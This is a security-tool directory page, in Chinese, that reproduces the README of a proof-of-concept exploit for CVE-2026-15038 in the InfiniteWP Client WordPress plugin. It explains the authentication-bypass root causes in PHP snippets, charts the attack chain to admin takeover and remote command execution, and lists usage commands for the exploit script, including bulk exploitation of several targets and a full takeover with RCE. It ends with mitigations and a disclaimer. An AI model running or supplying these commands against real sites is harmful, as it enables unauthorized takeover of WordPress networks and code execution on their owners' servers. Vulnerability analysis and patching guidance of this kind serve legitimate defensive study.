Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
By-Poloss..-..CVE-2026-15038-POC — 针对 InfiniteWP Client WordPress 插件中 CVE-2026-15038 的 PoC 漏洞利用:可绕过 Multisite 上的身份验证、绑定攻击者的 RSA 密钥、升级为管理员接管,并可通过 WP-CLI 执行远程命令。 | Kitploit
工具/GitHubGitHub/polosss/by-poloss..-..cve-2026-15038-poc
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试身份验证
GitHubpolosss/by-poloss..-..cve-2026-15038-poc

By-Poloss..-..CVE-2026-15038-POC

针对 InfiniteWP Client WordPress 插件中 CVE-2026-15038 的 PoC 漏洞利用:可绕过 Multisite 上的身份验证、绑定攻击者的 RSA 密钥、升级为管理员接管,并可通过 WP-CLI 执行远程命令。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
111天前尚未审核

🚨 CVE-2026-15038 — InfiniteWP Client 管理员接管

WordPress 多站点中未经身份验证的管理员账户接管

CVE CVSS CWE WPScan


📋 概述

WordPress 的 InfiniteWP Client 插件(< 1.13.6)存在一个影响 多站点安装 的严重身份验证绕过漏洞。

未经过身份验证的攻击者可以:

  • 🔓 绕过所有身份验证检查
  • 🔑 绑定自己的加密密钥
  • 👑 接管管理员会话
  • 💻 实现远程代码执行 (RCE)
  • 🌐 入侵整个 WordPress 网络

🔍 根本原因分析

🐛 漏洞 #1:连接状态不匹配

root@kitploit:~
if (!$iwp_mmb_core->get_option('iwp_client_action_message_id') 
    && !$iwp_mmb_core->get_option('iwp_client_public_key'))
  • 读取器:使用 get_site_option() → 从网络级(wp_sitemeta)读取
  • 写入器:使用 update_blog_option() → 写入每个博客(wp_X_options)

💥 结果:在多站点环境下,该防护检查始终返回 false — 始终允许重新配对。

🐛 漏洞 #2:激活密钥绕过

root@kitploit:~
if(trim($activation_key) != get_option('iwp_client_activate_key')){
  • 激活后,密钥被删除 → get_option() 返回 false
  • 攻击者 不 发送 activation_key → trim(null) → ''
  • PHP 松散比较:'' != false → false → 检查通过 🎯

🐛 漏洞 #3:攻击者控制的密钥对

  • 攻击者生成自己的 RSA 密钥对
  • 自行签署请求 → openssl_verify() 通过
  • 插件将攻击者的密钥绑定到网络中的 所有 博客

🚀 利用链

root@kitploit:~
graph LR
    A[Send POST Request] --> B[Add Site Action]
    B --> C[Guard Bypassed]
    C --> D[Activation Key Check Fails]
    D --> E[Signature Verifies]
    E --> F[Attacker Key Bound]
    F --> G[Full Admin Access]
    G --> H[RCE Achieved]

💻 安装

root@kitploit:~
# Clone the repository
git clone https://github.com/yourusername/CVE-2026-15038.git
cd CVE-2026-15038

# Install dependencies
pip install -r requirements.txt

🎯 使用方法

基本单目标

root@kitploit:~
python3 exploit.py -t https://wordpress.ddev.site

批量利用

root@kitploit:~
python3 exploit.py -t https://target1.com -t https://target2.com -t https://target3.com

自定义命令执行

root@kitploit:~
python3 exploit.py -t https://wordpress.ddev.site --command "wp plugin install hello-dolly --activate"

完整攻击链

root@kitploit:~
python3 exploit.py -t https://wordpress.ddev.site --takeover --rce

📂 文件结构

文件描述
exploit.py🐍 主漏洞利用脚本,支持批量利用
requirements.txt📦 Python 依赖项
README.md📖 本文档

⚠️ 重要说明

  • ✅ 适用于 WordPress 多站点 安装
  • ❌ 对单站点安装 无效
  • 🔒 已在 InfiniteWP Client 1.13.6 中修复
  • 🔐 始终更新到最新版本

🛡️ 缓解措施

  1. 立即行动:更新至 InfiniteWP Client ≥ 1.13.6
  2. 验证:检查是否存在可疑的管理员用户
  3. 审计:审查日志中最近的 add_site 请求
  4. 监控:留意异常的插件活动

🔗 资源

  • NVD 条目
  • WPScan 公告

⚖️ 免责声明

此工具仅用于 教育和安全测试目的。请仅在您拥有或已获得明确测试授权的系统上使用。作者对滥用行为不承担任何责任。


下载工具